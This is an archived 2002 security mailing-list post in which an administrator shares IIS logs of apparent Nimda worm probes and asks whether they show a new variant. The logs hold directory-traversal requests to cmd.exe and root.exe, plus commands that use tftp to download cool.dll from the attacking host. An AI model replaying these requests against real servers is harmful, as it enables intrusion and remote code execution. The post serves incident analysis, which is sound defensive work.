Another Nimda attack??

From: Eugene Chua Yew Gin (chuayg@1-net.com.sg)
Date: Tue Sep 17 2002 - 02:42:37 PDT

Next message: Curt Wilson: "Win2K Advaned Server compromise report available"

Previous message: zeno: "Good practicle php attack example"
Next in thread: Roger Thompson: "Re: Another Nimda attack??"
Reply: Roger Thompson: "Re: Another Nimda attack??"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi, need some advice for the below log, can anyone advice if its are a pattern
of Nimda which I find it rather strange because it downloads cool.dll and
httpodbc.dll instead of Admin.dll.  Norton Antivirus reported a W32.Nimda.E@MM
(dr) virus, is it a new variant??

Thanks and regards.

2002-09-16 07:53:21 202.100.249.231 - xxxx 80 GET /scripts/root.exe /c+dir 404 -
2002-09-16 07:53:21 202.100.249.231 - xxxx 80 GET /MSADC/root.exe /c+dir 403 -
2002-09-16 07:53:23 202.100.249.231 - xxxx 80 GET /c/winnt/system32/cmd.exe
/c+dir 404 -
2002-09-16 07:53:23 202.100.249.231 - xxxx 80 GET /d/winnt/system32/cmd.exe
/c+dir 404 -
2002-09-16 07:53:25 202.100.249.231 - xxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2002-09-16 07:53:56 202.100.249.231 - xxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20202.100.249.231%20GET%20
cool.dll%20c:\httpodbc.dll 502 -
2002-09-16 07:54:24 202.100.249.231 - 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20d:\httpodbc.dll 502 -
2002-09-16 07:54:51 202.100.249.231 - 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20e:\httpodbc.dll 502 -
2002-09-16 07:54:53 202.100.249.231 - 80 GET /scripts/..%5c../httpodbc.dll - 500
-
2002-09-16 07:54:53 202.100.249.231 - 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -
2002-09-16 07:54:54 202.100.249.231 - 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20c:\httpodbc.dll 502 -
2002-09-16 07:54:54 202.100.249.231 - 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20d:\httpodbc.dll 502 -
2002-09-16 07:54:55 202.100.249.231 - 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20e:\httpodbc.dll 502 -
2002-09-16 07:54:55 202.100.249.231 - 80 GET
/_vti_bin/..%5c../..%5c../..%5c../httpodbc.dll - 500 -
2002-09-16 07:54:55 202.100.249.231 - 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-09-16 07:54:57 202.100.249.231 - 80 GET
/msadc/..%5c../..%5c../..%5c/..


Á

../..


Á

../..


Á

../winnt/system32/cmd.exe /c+dir
403 -
2002-09-16 07:54:57 202.100.249.231 - 80 GET
/scripts/..


Á

../winnt/system32/cmd.exe /c+dir 500 -
2002-09-16 07:54:58 202.100.249.231 - 80 GET /scripts/winnt/system32/cmd.exe
/c+dir 404 -
2002-09-16 07:54:58 202.100.249.231 - 80 GET
/scripts/../../winnt/system32/cmd.exe /c+dir 200 -



----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: Curt Wilson: "Win2K Advaned Server compromise report available"
Previous message: zeno: "Good practicle php attack example"
Next in thread: Roger Thompson: "Re: Another Nimda attack??"
Reply: Roger Thompson: "Re: Another Nimda attack??"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Sep 17 2002 - 17:38:52 PDT